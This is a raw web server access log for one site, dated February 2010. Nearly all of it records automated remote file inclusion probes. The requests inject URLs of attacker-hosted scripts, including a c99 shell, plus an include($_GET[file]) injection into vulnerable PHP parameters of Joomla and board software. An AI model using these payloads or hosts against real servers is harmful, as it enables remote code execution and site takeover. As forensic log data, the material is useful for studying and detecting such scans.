65.60.10.18 - - [25/Feb/2010:10:09:41 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:09:54 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:09:54 -0800] "GET /logs/access_100204.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:09:54 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:10:10:06 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:10:10:06 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:10:10:06 -0800] "GET /logs/access_100203.log%20%20//board/bbs/delete_all.php?board_skin_path=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:10:10:08 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:10:10:08 -0800] "GET /logs/access_100203.log%20%20//board/bbs/delete_all.php?board_skin_path=http://smadi.110mb.com/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:10:10:08 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:02 -0800] "GET /logs/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:02 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:02 -0800] "GET /port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /logs/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /logs/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /logs/access_100118.log/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /logs/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /logs/access_100118.log/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:04 -0800] "GET /port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:05 -0800] "GET /port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:05 -0800] "GET /logs/access_100118.log/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:05 -0800] "GET /logs/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:05 -0800] "GET /port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:05 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:05 -0800] "GET /logs/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:28 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:28 -0800] "GET /logs/access_100204.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:28 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:29 -0800] "GET /logs/access_100216.log/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:29 -0800] "GET /logs/access_100216.log/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:29 -0800] "GET /logs/access_100216.log/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:32 -0800] "GET /logs/access_100216.log%20%20/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:33 -0800] "GET /logs/access_100216.log%20%20/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:11:36 -0800] "GET /logs/access_100216.log%20%20/port.php?content=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:12:27 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:12:27 -0800] "GET /logs/port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:12:27 -0800] "GET /port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:12:51 -0800] "GET /logs/access_100216.log%20%20/port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:10:13:52 -0800] "GET /write_comment_update.php/?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:10:13:52 -0800] "GET /logs/access_100210.log%20%20//write_comment_update.php/?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:10:13:52 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [25/Feb/2010:10:14:39 -0800] "GET /ideal/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
204.236.244.231 - - [25/Feb/2010:10:15:49 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
204.236.244.231 - - [25/Feb/2010:10:15:49 -0800] "GET /orange_g/forum/viewtopic.php?p=27953 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
65.60.10.18 - - [25/Feb/2010:10:16:44 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:16:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:16:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:17:57 -0800] "GET /port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:17:57 -0800] "GET /logs/port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:17:57 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:18:32 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:18:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:18:32 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:18:38 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:18:41 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:18:41 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:18:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:18:50 -0800] "GET /logs/access_100216.log%20%20/port.php?content=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:19:43 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:19:44 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:19:44 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:19:46 -0800] "GET /logs/access_100208.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:19:59 -0800] "GET /logs/access_100204.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:19:59 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:19:59 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:19:59 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:20:03 -0800] "GET /logs/access_100204.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:09 -0800] "GET /logs/access_100121.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:09 -0800] "GET /logs/access_100121.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:09 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:09 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:10 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:10 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:13 -0800] "GET /logs/access_100121.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:13 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:14 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:27 -0800] "GET /logs/access_100213.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:28 -0800] "GET /logs/access_100213.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:22:28 -0800] "GET /logs/access_100213.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
207.45.176.98 - - [25/Feb/2010:10:22:37 -0800] "GET /logs/access_100205.log//components/com_loudmounth/includes/abbc/abbc.clashttp://www.saldiri.org/c99.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
207.45.176.98 - - [25/Feb/2010:10:22:37 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.clashttp://www.saldiri.org/c99.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:23:09 -0800] "GET /logs/access_100218.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:23:10 -0800] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:23:11 -0800] "GET /logs///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:23:27 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:23:27 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:23:27 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:23:27 -0800] "GET /logs/access_100208.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:28 -0800] "GET /logs/access_100213.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:28 -0800] "GET /logs/access_100213.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:28 -0800] "GET /logs/access_100213.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:29 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:29 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:29 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:29 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:29 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:23:29 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:24:06 -0800] "GET /logs/access_100218.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:24:07 -0800] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:24:07 -0800] "GET /logs///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:24:37 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:24:37 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:24:37 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:10:24:48 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://hariani.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:10:24:48 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://hariani.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:10:24:48 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://hariani.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:10:24:48 -0800] "GET /logs/access_100203.log%20%20//board/bbs/delete_all.php?board_skin_path=http://hariani.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:10:24:48 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://hariani.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:10:24:48 -0800] "GET /logs/access_100203.log%20%20//board/bbs/delete_all.php?board_skin_path=http://hariani.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:10:24:58 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:24:59 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:24:59 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:24:59 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:25:06 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:25:08 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:10:25:09 -0800] "GET /logs/access_100208.log/convert/mvcw.php?step=1&vwar_root=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
